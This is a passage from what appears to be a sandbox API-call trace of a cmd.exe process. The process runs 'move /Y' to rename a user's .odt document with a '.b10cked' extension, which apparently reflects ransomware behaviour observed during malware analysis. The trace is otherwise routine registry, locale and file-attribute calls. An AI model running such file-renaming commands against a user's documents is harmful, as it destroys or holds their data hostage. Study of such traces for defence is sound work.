= 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15652 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15653 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15654 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15655 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15656 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 15657 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15658 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15659 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15660 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15661 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15662 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15663 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 15664 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 15665 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 224 os_tid = 0xe64 [0140.364] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fecc | out: lpSystemTimeAsFileTime=0x26fecc*(dwLowDateTime=0x8d99ca80, dwHighDateTime=0x1d440a9)) [0140.364] GetCurrentProcessId () returned 0xf1c [0140.364] GetCurrentThreadId () returned 0xe64 [0140.364] GetTickCount () returned 0x2c13b [0140.364] QueryPerformanceCounter (in: lpPerformanceCount=0x26fec4 | out: lpPerformanceCount=0x26fec4*=19715620806) returned 1 [0140.368] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.368] __set_app_type (_Type=0x1) [0140.368] __p__fmode () returned 0x76b331f4 [0140.368] __p__commode () returned 0x76b331fc [0140.368] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.368] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.368] GetCurrentThreadId () returned 0xe64 [0140.368] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe64) returned 0x38 [0140.368] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.369] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.369] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.369] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.369] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fe5c | out: phkResult=0x26fe5c*=0x0) returned 0x2 [0140.369] VirtualQuery (in: lpAddress=0x26fe93, lpBuffer=0x26fe2c, dwLength=0x1c | out: lpBuffer=0x26fe2c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.369] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fe2c, dwLength=0x1c | out: lpBuffer=0x26fe2c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.369] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fe2c, dwLength=0x1c | out: lpBuffer=0x26fe2c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.369] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fe2c, dwLength=0x1c | out: lpBuffer=0x26fe2c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.369] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fe2c, dwLength=0x1c | out: lpBuffer=0x26fe2c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.369] GetConsoleOutputCP () returned 0x1b5 [0140.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.369] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.369] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.369] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.370] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.370] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.370] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.370] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.370] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.370] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.370] GetEnvironmentStringsW () returned 0x3d0180* [0140.371] FreeEnvironmentStringsW (penv=0x3d0180) returned 1 [0140.371] GetEnvironmentStringsW () returned 0x3d0180* [0140.371] FreeEnvironmentStringsW (penv=0x3d0180) returned 1 [0140.371] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26edcc | out: phkResult=0x26edcc*=0x40) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0xa8, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x1, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0x1, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x0, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x40, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x40, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0x40, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.371] RegCloseKey (hKey=0x40) returned 0x0 [0140.371] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26edcc | out: phkResult=0x26edcc*=0x40) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0x40, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x1, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0x1, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x0, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x9, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x9, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0x9, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.372] RegCloseKey (hKey=0x40) returned 0x0 [0140.372] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.372] srand (_Seed=0x5b88636e) [0140.372] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked\"" [0140.372] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked\"" [0140.372] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.372] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.373] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.373] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.373] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.373] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.373] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.373] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.373] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.373] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.373] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.373] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.373] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.373] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.373] GetEnvironmentStringsW () returned 0x3d22d0* [0140.373] FreeEnvironmentStringsW (penv=0x3d22d0) returned 1 [0140.373] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.373] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.373] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.373] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.373] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.373] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.373] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.373] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.373] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.374] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.374] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fb98 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.374] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26fb98, lpFilePart=0x26fb94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26fb94*="Desktop") returned 0x18 [0140.374] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.374] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f914 | out: lpFindFileData=0x26f914) returned 0x3d0010 [0140.374] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0140.374] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f914 | out: lpFindFileData=0x26f914) returned 0x3d0010 [0140.374] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0140.374] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f914 | out: lpFindFileData=0x26f914) returned 0x3d0010 [0140.374] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0140.375] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.375] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.375] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.375] GetEnvironmentStringsW () returned 0x3d2af0* [0140.375] FreeEnvironmentStringsW (penv=0x3d2af0) returned 1 [0140.375] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.375] GetConsoleOutputCP () returned 0x1b5 [0140.376] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.376] GetUserDefaultLCID () returned 0x409 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fcd8, cchData=128 | out: lpLCData="0") returned 2 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fcd8, cchData=128 | out: lpLCData="0") returned 2 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fcd8, cchData=128 | out: lpLCData="1") returned 2 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.377] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.378] GetConsoleTitleW (in: lpConsoleTitle=0x3c08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.378] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.378] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.378] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.378] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.379] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.379] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.379] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.379] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.379] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.379] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.379] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.382] GetConsoleTitleW (in: lpConsoleTitle=0x26f9d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.918] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.918] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.918] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.918] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.918] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0140.918] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.919] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.919] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.919] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.919] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.919] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.919] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.919] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.919] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0140.919] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.919] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.919] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.919] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.919] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0140.919] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.919] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.919] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.919] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0140.919] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.919] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.919] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.919] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.919] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.919] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.919] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0140.919] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.919] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.919] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.919] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0140.919] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.921] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f78c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f784, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f784*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.922] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.923] _wcsicmp (_String1="0Q56T.odt", _String2=".") returned 2 [0140.923] _wcsicmp (_String1="0Q56T.odt", _String2="..") returned 2 [0140.923] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt")) returned 0x20 [0140.923] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.923] SetErrorMode (uMode=0x0) returned 0x0 [0140.923] SetErrorMode (uMode=0x1) returned 0x0 [0140.923] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", nBufferLength=0x104, lpBuffer=0x26f114, lpFilePart=0x26f0fc | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", lpFilePart=0x26f0fc*="0Q56T.odt") returned 0x2c [0140.923] SetErrorMode (uMode=0x0) returned 0x1 [0140.923] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0140.923] _wcsicmp (_String1="0Q56T.odt", _String2=".") returned 2 [0140.923] _wcsicmp (_String1="0Q56T.odt", _String2="..") returned 2 [0140.923] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt")) returned 0x20 [0140.923] SetErrorMode (uMode=0x0) returned 0x0 [0140.923] SetErrorMode (uMode=0x1) returned 0x0 [0140.923] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", nBufferLength=0x104, lpBuffer=0x26f590, lpFilePart=0x26f328 | out: 